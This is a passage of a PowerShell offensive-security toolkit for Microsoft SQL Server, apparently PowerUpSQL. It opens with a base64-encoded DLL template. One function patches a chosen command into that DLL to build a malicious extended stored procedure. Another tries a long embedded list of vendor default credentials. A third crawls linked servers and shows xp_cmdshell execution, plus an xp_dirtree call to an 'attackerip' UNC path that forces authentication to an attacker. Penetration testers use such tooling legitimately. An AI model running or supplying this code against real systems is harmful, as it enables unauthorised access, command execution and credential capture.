Oii+P//xwXKyAAAAQAAAOhv+f//D7bAhcB1Autw6K34//9IjQ2/+P//6EL4///okvj//0iNDZD4///oMfj//+ge9///SI0VBnoAAEiNDe94AADog/f//4XAdALrMOiA+f//D7bAhcB1AusiSI0Vv3cAAEiNDah2AADoQvj//8cFUcgAAAIAAADGRCQhAA+2TCQg6Mb2//8PtkQkIYXAdAQzwOtj6F73//9IiUQkKEiLRCQoSIM4AHQ7SItMJCjo1vb//w+2wIXAdCpIi0QkKEiLAEiJRCQwSItMJDDoWPf//0yLRCRYugIAAABIi0wkUP9UJDCLBY/HAAD/wIkFh8cAALgBAAAASIPESMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiEwkCEiD7DiDPRnHAAAAfwQzwOtkiwUNxwAA/8iJBQXHAADom/f//4hEJCCDPUXHAAACdAq5BwAAAOgH9///6Iv1///HBSrHAAAAAAAA6NX2//8PtkwkIOif9f//M9IPtkwkQOi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# Convert it to a byte array [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64) # This is the string in the DLL template that will need to be replaced $BufferString = 'REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!' # ----------------------------------------------- # Setup command # ----------------------------------------------- # Command to injectin into the DLL (if not defined by the user) IF(-not($Command)) { $CommandString = 'echo This is a test. > c:\temp\test.txt && REM' } else { $CommandString = "$Command && REM" } # Calculate the length of the BufferString $BufferStringLen = $BufferString.Length # Calculate the length of the Command $CommandStringLen = $CommandString.Length # Check if the command is to long to be accepted by cmd.exe used by the system call if ($CommandStringLen -gt $BufferStringLen) { Write-Warning -Message ' Command is too long!' Break } else { $BuffLenDiff = $BufferStringLen - $CommandStringLen $NewBuffer = ' ' * $BuffLenDiff $CommandString = "$CommandString && REM $NewBuffer" } # Convert command string $CommandStringBytes = ([system.Text.Encoding]::UTF8).GetBytes($CommandString) # Get string value of the DLL file $S = [System.Text.Encoding]::ASCII.GetString($DllBytes) # Set the offset to 0 $Index = 0 # Get the starting offset of the buffer string $Index = $S.IndexOf($BufferString) if(($Index -eq 0) -and ($Index -ne -1)) { throw("Could not find string $BufferString !") Break } else { Write-Verbose -Message " Found buffer offset for command: $Index" } # Replace target bytes for ($i = 0; $i -lt $CommandStringBytes.Length; $i++) { $DllBytes[$Index+$i] = $CommandStringBytes[$i] } # ----------------------------------------------- # Setup proc / dll function export name # ----------------------------------------------- $ProcNameBuffer = 'EVILEVILEVILEVILEVIL' # Set default dll name IF(-not($ExportName)) { $ExportName = 'xp_evil' } # Check function name length $ProcNameBufferLen = $ProcNameBuffer.Length $ExportNameLen = $ExportName.Length If ($ProcNameBufferLen -lt $ExportNameLen) { Write-Warning -Message ' The function name is too long!' Break } else { $ProcBuffLenDiff = $ProcNameBufferLen - $ExportNameLen $ProcNewBuffer = '' * $ProcBuffLenDiff #$ExportName = "$ExportName$ProcNewBuffer" # need to write nullbytes } # Get function name string offset $ProcIndex = 0 # Get string value of the DLL file $S2 = [System.Text.Encoding]::ASCII.GetString($DllBytes) $ProcIndex = $S2.IndexOf($ProcNameBuffer) # Check for offset errors if(($ProcIndex -eq 0) -and ($ProcIndex -ne -1)) { throw("Could not find string $ProcNameBuffer!") Break } else { Write-Verbose -Message " Found buffer offset for function name: $ProcIndex" } # Convert function name to bytes $ExportNameBytes = ([system.Text.Encoding]::UTF8).GetBytes($ExportName) # Replace target bytes for ($i = 0; $i -lt $ExportNameBytes.Length; $i++) { $DllBytes[$ProcIndex+$i] = $ExportNameBytes[$i] } # Get offset for nulls $NullOffset = $ProcIndex+$ExportNameLen Write-Verbose -Message " Found buffer offset for buffer: $NullOffset" $NullBytes = ([system.Text.Encoding]::UTF8).GetBytes($ProcNewBuffer) # Replace target bytes for ($i = 0; $i -lt $ProcBuffLenDiff; $i++) { $DllBytes[$NullOffset+$i] = $NullBytes[$i] } # ------------------------------------ # Write DLL file to disk # ------------------------------------ IF(-not($OutFile)) { $OutFile = '.\evil64.dll' } Write-Verbose -Message "Creating DLL $OutFile" Write-Verbose -Message " - Exported function name: $ExportName" Write-Verbose -Message " - Exported function command: `"$Command`"" Write-Verbose -Message " - Manual test: rundll32 $OutFile,$ExportName" Set-Content -Value $DllBytes -Encoding Byte -Path $OutFile Write-Verbose -Message ' - DLL written' Write-Verbose -Message ' ' Write-Verbose -Message 'SQL Server Notes' Write-Verbose -Message 'The exported function can be registered as a SQL Server extended stored procedure. Options below:' Write-Verbose -Message " - Register xp via local disk: sp_addextendedproc `'$ExportName`', 'c:\temp\myxp.dll'" Write-Verbose -Message " - Register xp via UNC path: sp_addextendedproc `'$ExportName`', `'\\servername\pathtofile\myxp.dll`'" Write-Verbose -Message " - Unregister xp: sp_dropextendedproc `'$ExportName`'" } # ---------------------------------- # Get-SQLServerLoginDefaultPw # ---------------------------------- # Author: Scott Sutherland # Reference: https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md Function Get-SQLServerLoginDefaultPw { <# .SYNOPSIS Based on the instance name, test if SQL Server is configured with default passwords. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLServerLoginDefaultPw -Instance SQLServer1\STANDARDDEV2014 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerLoginDefaultPw -Verbose VERBOSE: SQLServer1\SQLEXPRESS : Confirmed instance match. VERBOSE: SQLServer1\SQLEXPRESS : No credential matches were found. VERBOSE: SQLServer1\STANDARDDEV2014 : Confirmed instance match. VERBOSE: SQLServer1\STANDARDDEV2014 : Confirmed default credentials - test/test VERBOSE: SQLServer1 : No instance match found. Computer Instance Username Password IsSysadmin -------- -------- -------- -------- -------- SQLServer1 SQLServer1\STANDARDDEV2014 test test No .EXAMPLE PS C:\> Get-SQLInstanceLDomain | Get-SQLServerLoginDefaultPw -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblResults = New-Object -TypeName System.Data.DataTable $TblResults.Columns.Add('Computer') | Out-Null $TblResults.Columns.Add('Instance') | Out-Null $TblResults.Columns.Add('Username') | Out-Null $TblResults.Columns.Add('Password') | Out-Null $TblResults.Columns.Add('IsSysAdmin') | Out-Null # Create table for database of defaults $DefaultPasswords = New-Object System.Data.DataTable $DefaultPasswords.Columns.Add('Instance') | Out-Null $DefaultPasswords.Columns.Add('Username') | Out-Null $DefaultPasswords.Columns.Add('Password') | Out-Null # Populate DefaultPasswords data table $DefaultPasswords.Rows.Add("ACS","ej","ej") | Out-Null $DefaultPasswords.Rows.Add("ACT7","sa","sage") | Out-Null $DefaultPasswords.Rows.Add("AOM2","admin","ca_admin") | out-null $DefaultPasswords.Rows.Add("ARIS","ARIS9","*ARIS!1dm9n#") | out-null $DefaultPasswords.Rows.Add("AutodeskVault","sa","AutodeskVault@26200") | Out-Null $DefaultPasswords.Rows.Add("BOSCHSQL","sa","RPSsql12345") | Out-Null $DefaultPasswords.Rows.Add("BPASERVER9","sa","AutoMateBPA9") | Out-Null $DefaultPasswords.Rows.Add("CDRDICOM","sa","CDRDicom50!") | Out-Null $DefaultPasswords.Rows.Add("CODEPAL","sa","Cod3p@l") | Out-Null $DefaultPasswords.Rows.Add("CODEPAL08","sa","Cod3p@l") | Out-Null $DefaultPasswords.Rows.Add("CounterPoint","sa","CounterPoint8") | Out-Null $DefaultPasswords.Rows.Add("CSSQL05","ELNAdmin","ELNAdmin") | Out-Null $DefaultPasswords.Rows.Add("CSSQL05","sa","CambridgeSoft_SA") | Out-Null $DefaultPasswords.Rows.Add("CADSQL","CADSQLAdminUser","Cr41g1sth3M4n!") | Out-Null #Maybe a local windows account $DefaultPasswords.Rows.Add("DHLEASYSHIP","sa","DHLadmin@1") | Out-Null $DefaultPasswords.Rows.Add("DPM","admin","ca_admin") | out-null $DefaultPasswords.Rows.Add("DVTEL","sa","") | Out-Null $DefaultPasswords.Rows.Add("EASYSHIP","sa","DHLadmin@1") | Out-Null $DefaultPasswords.Rows.Add("ECC","sa","Webgility2011") | Out-Null $DefaultPasswords.Rows.Add("ECOPYDB","e+C0py2007_@x","e+C0py2007_@x") | Out-Null $DefaultPasswords.Rows.Add("ECOPYDB","sa","ecopy") | Out-Null $DefaultPasswords.Rows.Add("Emerson2012","sa","42Emerson42Eme") | Out-Null $DefaultPasswords.Rows.Add("HDPS","sa","sa") | Out-Null $DefaultPasswords.Rows.Add("HPDSS","sa","Hpdsdb000001") | Out-Null $DefaultPasswords.Rows.Add("HPDSS","sa","hpdss") | Out-Null $DefaultPasswords.Rows.Add("INSERTGT","msi","keyboa5") | Out-Null $DefaultPasswords.Rows.Add("INSERTGT","sa","") | Out-Null $DefaultPasswords.Rows.Add("INTRAVET","sa","Webster#1") | Out-Null $DefaultPasswords.Rows.Add("MYMOVIES","sa","t9AranuHA7") | Out-Null $DefaultPasswords.Rows.Add("PCAMERICA","sa","pcAmer1ca") | Out-Null $DefaultPasswords.Rows.Add("PCAMERICA","sa","PCAmerica") | Out-Null $DefaultPasswords.Rows.Add("PRISM","sa","SecurityMaster08") | Out-Null $DefaultPasswords.Rows.Add("RMSQLDATA","Super","Orange") | out-null $DefaultPasswords.Rows.Add("RTCLOCAL","sa","mypassword") | Out-Null $DefaultPasswords.Rows.Add("RBAT","sa",'34TJ4@#$') | Out-Null $DefaultPasswords.Rows.Add("RIT","sa",'34TJ4@#$') | Out-Null $DefaultPasswords.Rows.Add("RCO","sa",'34TJ4@#$') | Out-Null $DefaultPasswords.Rows.Add("REDBEAM","sa",'34TJ4@#$') | Out-Null $DefaultPasswords.Rows.Add("SALESLOGIX","sa","SLXMaster") | Out-Null $DefaultPasswords.Rows.Add("SIDEXIS_SQL","sa","2BeChanged") | Out-Null $DefaultPasswords.Rows.Add("SQL2K5","ovsd","ovsd") | Out-Null $DefaultPasswords.Rows.Add("SQLEXPRESS","admin","ca_admin") | out-null $DefaultPasswords.Rows.Add("SQLEXPRESS","gcs_client","SysGal.5560") | Out-Null #SA password = GCSsa5560 $DefaultPasswords.Rows.Add("SQLEXPRESS","gcs_web_client","SysGal.5560") | out-null #SA password = GCSsa5560 $DefaultPasswords.Rows.Add("SQLEXPRESS","NBNUser","NBNPassword") | out-null $DefaultPasswords.Rows.Add("STANDARDDEV2014","test","test") | Out-Null $DefaultPasswords.Rows.Add("TEW_SQLEXPRESS","tew","tew") | Out-Null $DefaultPasswords.Rows.Add("vocollect","vocollect","vocollect") | Out-Null $DefaultPasswords.Rows.Add("VSDOTNET","sa","") | Out-Null $DefaultPasswords.Rows.Add("VSQL","sa","111") | Out-Null $DefaultPasswords.Rows.Add("CASEWISE","sa","") | Out-Null $DefaultPasswords.Rows.Add("VANTAGE","sa","vantage12!") | Out-Null $DefaultPasswords.Rows.Add("BCM","bcmdbuser","Bcmuser@06") | Out-Null $DefaultPasswords.Rows.Add("BCM","bcmdbuser","Numara@06") | Out-Null $DefaultPasswords.Rows.Add("DEXIS_DATA","sa","dexis") | Out-Null $DefaultPasswords.Rows.Add("DEXIS_DATA","dexis","dexis") | Out-Null $DefaultPasswords.Rows.Add("SMTKINGDOM","SMTKINGDOM",'$ei$micMicro') | Out-Null $DefaultPasswords.Rows.Add("RE7_MS","Supervisor",'Supervisor') | Out-Null $DefaultPasswords.Rows.Add("RE7_MS","Admin",'Admin') | Out-Null $DefaultPasswords.Rows.Add("OHD","sa",'ohdusa@123') | Out-Null $DefaultPasswords.Rows.Add("UPC","serviceadmin",'Password.0') | Out-Null #Maybe a local windows account $DefaultPasswords.Rows.Add("Hirsh","Velocity",'i5X9FG42') | Out-Null $DefaultPasswords.Rows.Add("Hirsh","sa",'i5X9FG42') | Out-Null $DefaultPasswords.Rows.Add("SPSQL","sa",'SecurityMaster08') | Out-Null $DefaultPasswords.Rows.Add("CAREWARE","sa",'') | Out-Null $PwCount = $DefaultPasswords | measure | select count -ExpandProperty count # Write-Verbose "Loaded $PwCount default passwords." } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Grab only the instance name $TargetInstance = $Instance.Split("\")[1] # Bypass ports and default instances if(-not $TargetInstance){ Write-Verbose "$Instance : No named instance found." return } # Check if instance is in list $TblResultsTemp = "" $TblResultsTemp = $DefaultPasswords | Where-Object { $_.instance -eq "$TargetInstance"} if($TblResultsTemp){ Write-Verbose "$Instance : Confirmed instance match." }else{ Write-Verbose "$Instance : No instance match found." return } # Grab username and password $CurrentUsername = $TblResultsTemp.username $CurrentPassword = $TblResultsTemp.password # Test login $LoginTest = Get-SQLServerInfo -Instance $instance -Username $CurrentUsername -Password $CurrentPassword -SuppressVerbose if($LoginTest){ Write-Verbose "$Instance : Confirmed default credentials - $CurrentUsername/$CurrentPassword" $SysadminStatus = $LoginTest | select IsSysadmin -ExpandProperty IsSysadmin # Append if successful $TblResults.Rows.Add( $ComputerName, $Instance, $CurrentUsername, $CurrentPassword, $SysadminStatus ) | Out-Null }else{ Write-Verbose "$Instance : No credential matches were found." } } End { # Return data $TblResults } } Function Get-SQLServerLinkCrawl{ <# .SYNOPSIS Get-SQLServerLinkCrawl attempts to enumerate and follow MSSQL database links. .DESCRIPTION Get-SQLServerLinkCrawl attempts to enumerate and follow MSSQL database links. The function enumerates database names, versions, and links, and then enumerates the MSSQL user and the privileges that the link path has. .EXAMPLE Get-SQLServerLinkCrawl -Instance "servername\instancename" .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential Windows credentials. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Dedicated Administrator Connection (DAC). .PARAMETER TimeOut Connection timeout. .PARAMETER Query Custom SQL query to run on each server. .PARAMETER Export Convert collected data to exportable format. .Example Crawl linked servers and return a list of databases for each one in a readable format. Get-SQLServerLinkCrawl -instance "\SQLSERVER2008" -username 'guest' -password 'guest' | where Instance -ne "Broken Link" | foreach-object { Get-SQLQuery -instance "\SQLSERVER2008" -username 'guest' -password 'guest' -Query (get-SQLServerLinkQuery -Path $_.Path -Sql 'select system_user')} .Example Crawl linked servers and return a list of databases for each one as datatable objects. Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" .Example Crawl linked servers and return a list of databases for each one. and hide broken links. Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | where name -ne "Broken Link" | select name,version,path,links,user,sysadmin,customquery | format-table .Example Crawl linked servers, execute an OS command using xp_cmdshell, and return the results. Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'" | format-table .Example Crawl linked servers, execute xp_dirtree, and return results. This can also be used to force the SQL Server to authenticate to an attacker using a UNC path. Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree 'c:\temp'" -Export | format-table Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree '\\attackerip\file'" -Export | format-table .Example Crawl linked servers and return a list of databases for each one, then export to a to text objects for reporting. Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" -Export | where name -ne "broken link" | sort name | Format-Table #> [CmdletBinding()] Param( [Parameter(Mandatory=$false, HelpMessage="SQL Server or domain account to authenticate with.")] [string]$Username, [Parameter(Mandatory=$false, HelpMessage="SQL Server or domain account password to authenticate with.")] [string]$Password, [Parameter(Mandatory=$false, HelpMessage="Windows credentials.")] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory=$false, ValueFromPipelineByPropertyName=$true, HelpMessage="SQL Server instance to connection to.")] [string]$Instance, [Parameter(Mandatory=$false, HelpMessage="Dedicated Administrator Connection (DAC).")] [Switch]$DAC, [Parameter(Mandatory=$false, HelpMessage="Connection timeout.")] [int]$TimeOut = 2, [Parameter(Mandatory=$false, HelpMessage="Custom SQL query to run on each server.")] [string]$Query, [Parameter(Mandatory=$false, HelpMessage="Convert collected data to exportable format.")] [switch]$Export ) Begin { $List = @() $Server = New-Object PSObject -Property @{ Instance=""; Version=""; Links=@(); Path=@(); User=""; Sysadmin=""; CustomQuery=""} $List += $Server $SqlInfoTable = New-Object System.Data.DataTable } Process { $i=1 while($i){ $i-- foreach($Server in $List){ if($Server.Instance -eq "") { $List = (Get-SQLServerLinkData -list $List -server $Server -query $Query) $i++ # Verbose output Write-Verbose "--------------------------------" Write-Verbose " Server: $($Server.Instance)" Write-Verbose "--------------------------------" Write-Verbose " - Link Path to server: $($Server.Path -join ' -> ')" Write-Verbose " - Link Login: $($Server.User)" Write-Verbose " - Link IsSysAdmin: $($Server.Sysadmin)" Write-Verbose " - Link Count: $($Server.Links.Count)" Write-Verbose " - Links on this server: $($Server.Links -join ', ')" } } } if($Export){ $LinkList = New-Object System.Data.Datatable [void]$LinkList.Columns.Add("Instance") [void]$LinkList.Columns.Add("Version") [void]$LinkList.Columns.Add("Path") [void]$LinkList.Columns.Add("Links") [void]$LinkList.Columns.Add("User") [void]$LinkList.Columns.Add("Sysadmin") [void]$LinkList.Columns.Add("CustomQuery") foreach($Server in $List){ [void]$LinkList.Rows.Add($Server.instance,$Server.version,$Server.path -join " -> ", $Server.links -join ",", $Server.user, $Server.Sysadmin, $Server.CustomQuery -join ",") } return $LinkList } else { return $List } } End { } } Function Get-SQLServerLinkData{ [CmdletBinding()] Param( [Parameter(Mandatory=$true, HelpMessage="Return the server objects identified during the server link crawl. Link crawling is done via theGet-SQLServerLinkCrawl function.")] $List, [Parameter(Mandatory=$true, HelpMessage="Server object to be tested")] $Server, [Parameter(Mandatory=$false, HelpMessage="Custom SQL query to run")] $Query ) Begin { $SqlInfoQuery = "select @@servername as servername, @@version as version, system_user as linkuser, is_srvrolemember('sysadmin') as role" $SqlLinksQuery = "select srvname from master..sysservers where dataaccess=1" } Process { $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $SqlInfoQuery)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential if($SqlInfoTable.Servername -ne $null){ $Server.Instance = $SqlInfoTable.Servername $Server.Version = [System.String]::Join("",(($SqlInfoTable.Version)[10..25])) 